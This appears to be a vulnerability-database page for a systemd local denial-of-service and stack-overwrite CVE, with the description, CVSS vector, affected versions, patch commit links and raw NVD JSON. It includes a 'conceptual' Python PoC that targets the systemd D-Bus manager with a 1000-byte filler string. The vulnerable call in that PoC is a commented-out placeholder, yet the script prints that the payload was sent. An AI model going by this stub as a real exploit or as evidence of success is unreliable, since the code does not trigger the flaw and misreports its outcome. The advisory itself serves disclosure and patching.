Security Vulnerability Report
CVE-2026-29111 CVSS 5.5 MEDIUM

Published: 2026-03-23 22:16:26
Last Modified: 2026-04-15 16:44:38

Description

systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On versions v249 and older, the effect is not an assert but a stack overwrite with attacker-controlled content. From version v250 onward this is not possible, as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:* - VULNERABLE (systemd v239 - v257.10)
cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:* - VULNERABLE (systemd v258.0 - v258.4)
cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:* - VULNERABLE (systemd v259.0 - v259.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# This is a conceptual PoC. The exact IPC interface and parameters required to
# trigger the vulnerability depend on the specific implementation details of systemd.
import dbus
import sys


def trigger_vulnerability():
    try:
        # Connect to the system bus
        bus = dbus.SystemBus()

        # The vulnerable IPC call is likely part of the systemd manager interface
        # Note: The exact object path and interface name would need to be confirmed
        # via source code analysis of the specific vulnerable commit.
        systemd_object = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
        manager_interface = dbus.Interface(systemd_object, 'org.freedesktop.systemd1.Manager')

        # Construct spurious data
        # The vulnerability is triggered by specific malformed data in an unprivileged call
        spurious_data = "A" * 1000  # Example payload length

        # Attempt to invoke the vulnerable method
        # Replace 'VulnerableMethod' with the actual method name if known
        # manager_interface.VulnerableMethod(spurious_data)

        print("[+] Payload sent, check system status.")
    except dbus.exceptions.DBusException as e:
        print(f"[-] DBus Exception: {e}")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    trigger_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29111", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:26.267", "lastModified": "2026-04-15T16:44:38.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On version v249 and older the effect is not an assert, but stack overwriting, with the attacker controlled content. From version v250 and newer this is not possible as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available."}, {"lang": "es", "value": "systemd, un gestor de sistemas y servicios, (como PID 1) activa una aserción y congela la ejecución cuando se realiza una llamada a la API IPC no privilegiada con datos espurios. En la versión v249 y anteriores, el efecto no es una aserción, sino una sobrescritura de pila, con contenido controlado por el atacante. A partir de la versión v250 y posteriores, esto no es posible ya que la comprobación de seguridad provoca una aserción en su lugar. Esta llamada IPC se añadió en v239, por lo que las versiones anteriores a esa no están afectadas. Las versiones 260-rc1, 259.2, 258.5 y 257.11 contienen parches. 
No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "239", "versionEndExcluding": "257.11", "matchCriteriaId": "8B7440B3-21E0-4CE7-B414-B468DF589EB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "258", "versionEndExcluding": "258.5", "matchCriteriaId": "17A98BF3-E6DB-4C8F-8D17-858CB679884E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "259", "versionEndExcluding": "259.2", "matchCriteriaId": "FE1B8AFB-01F5-4B3F-BB53-DCAE57F2C2A2"}]}]}], "references": [{"url": "https://github.com/systemd/systemd/commit/1d22f706bd04f45f8422e17fbde3f56ece17758a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/20021e7686426052e3a7505425d7e12085feb2a6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/21167006574d6b83813c7596759b474f56562412", "source": "[email protected]", "tags": ["Patch"]}, {"url": 
"https://github.com/systemd/systemd/commit/3cee294fe8cf4fa0eff933ab21416d099942cabd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/42aee39107fbdd7db1ccd402a2151822b2805e9f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/54588d2dedff54bfb6036670820650e4ea74628f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/7ac3220213690e8a8d6d2a6e81e43bd1dce01d69", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/80acea4ef80a4bb78560ed970c34952299b890d6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/b5fd14693057e5f2c9b4a49603be64ec3608ff6c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/efa6ba2ab625aaa160ac435a09e6482fc63bdbe8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/security/advisories/GHSA-gx6q-6f99-m764", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}